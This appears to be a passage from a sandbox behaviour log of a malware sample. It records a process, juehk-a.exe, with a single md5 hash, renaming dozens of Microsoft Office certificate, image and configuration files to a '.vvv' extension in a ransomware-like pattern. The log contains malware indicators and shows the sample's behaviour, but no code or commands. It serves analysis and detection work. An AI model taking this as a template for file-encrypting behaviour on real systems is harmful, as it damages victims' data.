- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME52.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME52.CSS.vvv
- ads:
- fid (ads:): 562949953496521
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99960
- mode: rename
- sequenceNumber: 2322
- filesize: 125006
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME53.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME53.CSS.vvv
- ads:
- fid (ads:): 562949953496522
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99974
- mode: rename
- sequenceNumber: 2323
- filesize: 127502
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME54.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME54.CSS.vvv
- ads:
- fid (ads:): 562949953496523
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 99989
- mode: rename
- sequenceNumber: 2324
- filesize: 123582
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME55.CSS
- new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME55.CSS.vvv
- ads:
- fid (ads:): 562949953496524
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 100338
- mode: rename
- sequenceNumber: 2325
- filesize: 16958
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\ADDINS\Power View Excel Add-in\BI-Report.png
- new_name: C:\Program Files\Microsoft Office\Office15\ADDINS\Power View Excel Add-in\BI-Report.png.vvv
- ads:
- fid (ads:): 562949953497181
- ntstatus: 0x0
- CreateOptions: 0x0
- high_cpu:
- timestamp: 100904
- sequenceNumber: 2326
- total_cpu: 63.63613053613053
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 63.63613053613053
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 101196
- mode: rename
- sequenceNumber: 2327
- filesize: 1502
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_expiration_terms_dict.txt
- new_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_expiration_terms_dict.txt.vvv
- ads:
- fid (ads:): 562949953501060
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101209
- mode: rename
- sequenceNumber: 2328
- filesize: 2670
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_security_terms_dict.txt
- new_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_security_terms_dict.txt.vvv
- ads:
- fid (ads:): 562949953501063
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101233
- mode: rename
- sequenceNumber: 2329
- filesize: 5502
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_terms_dict.txt
- new_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_terms_dict.txt.vvv
- ads:
- fid (ads:): 562949953501065
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101256
- mode: rename
- sequenceNumber: 2330
- filesize: 6334
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Configuration\ssn_high_group_info.txt
- new_name: C:\Program Files\Microsoft Office\Office15\Configuration\ssn_high_group_info.txt.vvv
- ads:
- fid (ads:): 562949953501070
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101424
- mode: rename
- sequenceNumber: 2331
- filesize: 1150
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Components\SignedComponents.cer
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Components\SignedComponents.cer.vvv
- ads:
- fid (ads:): 562949953501646
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101438
- mode: rename
- sequenceNumber: 2332
- filesize: 1086
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.vvv
- ads:
- fid (ads:): 562949953501648
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101467
- mode: rename
- sequenceNumber: 2333
- filesize: 1374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\Management.cer
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\Management.cer.vvv
- ads:
- fid (ads:): 562949953501050
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101484
- mode: rename
- sequenceNumber: 2334
- filesize: 1406
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\RELAY.CER
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\RELAY.CER.vvv
- ads:
- fid (ads:): 562949953499238
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101523
- mode: rename
- sequenceNumber: 2335
- filesize: 1358
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Code_Signing_2001-4_CA.cer
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Code_Signing_2001-4_CA.cer.vvv
- ads:
- fid (ads:): 562949953499737
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101538
- mode: rename
- sequenceNumber: 2336
- filesize: 1006
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.vvv
- ads:
- fid (ads:): 562949953499738
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101564
- mode: rename
- sequenceNumber: 2337
- filesize: 1326
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer.vvv
- ads:
- fid (ads:): 562949953499751
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101675
- mode: rename
- sequenceNumber: 2338
- filesize: 6254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\DataListIconImages.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\DataListIconImages.jpg.vvv
- ads:
- fid (ads:): 562949953497330
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101726
- mode: rename
- sequenceNumber: 2339
- filesize: 7886
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\GRIP.JPG
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\GRIP.JPG.vvv
- ads:
- fid (ads:): 562949953500945
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101856
- mode: rename
- sequenceNumber: 2340
- filesize: 3470
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\InformationIcon.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\InformationIcon.jpg.vvv
- ads:
- fid (ads:): 562949953500986
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 101979
- mode: rename
- sequenceNumber: 2341
- filesize: 53390
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginDialogBackground.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginDialogBackground.jpg.vvv
- ads:
- fid (ads:): 562949953498519
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102008
- mode: rename
- sequenceNumber: 2342
- filesize: 8254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginTool24x24Images.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginTool24x24Images.jpg.vvv
- ads:
- fid (ads:): 562949953498520
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102041
- mode: rename
- sequenceNumber: 2343
- filesize: 10126
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageAttachmentIconImages.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageAttachmentIconImages.jpg.vvv
- ads:
- fid (ads:): 562949953501076
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102059
- mode: rename
- sequenceNumber: 2344
- filesize: 9374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageHistoryIconImages.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageHistoryIconImages.jpg.vvv
- ads:
- fid (ads:): 562949953501083
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102091
- mode: rename
- sequenceNumber: 2345
- filesize: 16542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackground.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackground.jpg.vvv
- ads:
- fid (ads:): 562949953498791
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102103
- mode: rename
- sequenceNumber: 2346
- filesize: 16974
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackgroundRTL.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.vvv
- ads:
- fid (ads:): 562949953498792
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102116
- mode: rename
- sequenceNumber: 2347
- filesize: 1182
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierCloseButton.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierCloseButton.jpg.vvv
- ads:
- fid (ads:): 562949953498793
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102128
- mode: rename
- sequenceNumber: 2348
- filesize: 1134
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableDownArrow.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableDownArrow.jpg.vvv
- ads:
- fid (ads:): 562949953498794
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102139
- mode: rename
- sequenceNumber: 2349
- filesize: 1198
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableUpArrow.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.vvv
- ads:
- fid (ads:): 562949953498795
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102150
- mode: rename
- sequenceNumber: 2350
- filesize: 1294
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDownArrow.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDownArrow.jpg.vvv
- ads:
- fid (ads:): 562949953498796
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102162
- mode: rename
- sequenceNumber: 2351
- filesize: 1390
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierUpArrow.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierUpArrow.jpg.vvv
- ads:
- fid (ads:): 562949953498797
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102188
- mode: rename
- sequenceNumber: 2352
- filesize: 4398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\OutofSyncIconImages.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\OutofSyncIconImages.jpg.vvv
- ads:
- fid (ads:): 562949953501592
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102209
- mode: rename
- sequenceNumber: 2353
- filesize: 3518
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\QuestionIcon.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\QuestionIcon.jpg.vvv
- ads:
- fid (ads:): 562949953501599
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102239
- mode: rename
- sequenceNumber: 2354
- filesize: 26270
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared16x16Images.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared16x16Images.jpg.vvv
- ads:
- fid (ads:): 1407374883633595
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102269
- mode: rename
- sequenceNumber: 2355
- filesize: 6926
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared24x24Images.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared24x24Images.jpg.vvv
- ads:
- fid (ads:): 562949953501629
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102311
- mode: rename
- sequenceNumber: 2356
- filesize: 3774
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\STOPICON.JPG
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\STOPICON.JPG.vvv
- ads:
- fid (ads:): 844424930212561
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102323
- mode: rename
- sequenceNumber: 2357
- filesize: 10158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\TipsImage.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\TipsImage.jpg.vvv
- ads:
- fid (ads:): 562949953499659
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102335
- mode: rename
- sequenceNumber: 2358
- filesize: 1534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\VeriSignLogo.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\VeriSignLogo.jpg.vvv
- ads:
- fid (ads:): 562949953499739
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102400
- mode: rename
- sequenceNumber: 2359
- filesize: 18030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.vvv
- ads:
- fid (ads:): 562949953499966
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102430
- mode: rename
- sequenceNumber: 2360
- filesize: 13566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg.vvv
- ads:
- fid (ads:): 562949953499968
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102459
- mode: rename
- sequenceNumber: 2361
- filesize: 12574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg.vvv
- ads:
- fid (ads:): 562949953499970
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102477
- mode: rename
- sequenceNumber: 2362
- filesize: 18862
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.vvv
- ads:
- fid (ads:): 562949953499972
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102493
- mode: rename
- sequenceNumber: 2363
- filesize: 18558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg.vvv
- ads:
- fid (ads:): 562949953499974
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102516
- mode: rename
- sequenceNumber: 2364
- filesize: 5486
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg.vvv
- ads:
- fid (ads:): 562949953499976
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102532
- mode: rename
- sequenceNumber: 2365
- filesize: 17278
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.vvv
- ads:
- fid (ads:): 562949953499978
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102547
- mode: rename
- sequenceNumber: 2366
- filesize: 16414
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.vvv
- ads:
- fid (ads:): 562949953499980
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102573
- mode: rename
- sequenceNumber: 2367
- filesize: 9214
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.vvv
- ads:
- fid (ads:): 562949953500695
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102597
- mode: rename
- sequenceNumber: 2368
- filesize: 8078
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.vvv
- ads:
- fid (ads:): 562949953500698
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102616
- mode: rename
- sequenceNumber: 2369
- filesize: 9326
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.vvv
- ads:
- fid (ads:): 844424930211355
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102629
- mode: rename
- sequenceNumber: 2370
- filesize: 8062
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.vvv
- ads:
- fid (ads:): 1125899906922014
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102642
- mode: rename
- sequenceNumber: 2371
- filesize: 10558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.vvv
- ads:
- fid (ads:): 562949953501080
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102679
- mode: rename
- sequenceNumber: 2372
- filesize: 8590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg.vvv
- ads:
- fid (ads:): 562949953501962
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102692
- mode: rename
- sequenceNumber: 2373
- filesize: 8606
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg.vvv
- ads:
- fid (ads:): 562949953501963
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102708
- mode: rename
- sequenceNumber: 2374
- filesize: 4030
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\Computers\computericon.jpg
- new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\Computers\computericon.jpg.vvv
- ads:
- fid (ads:): 1125899906922019
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 102869
- mode: rename
- sequenceNumber: 2375
- filesize: 1042446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
